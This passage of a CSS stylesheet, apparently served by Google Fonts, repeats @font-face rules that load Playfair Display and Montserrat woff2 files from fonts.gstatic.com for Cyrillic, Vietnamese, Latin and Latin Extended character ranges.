url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 *//* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: 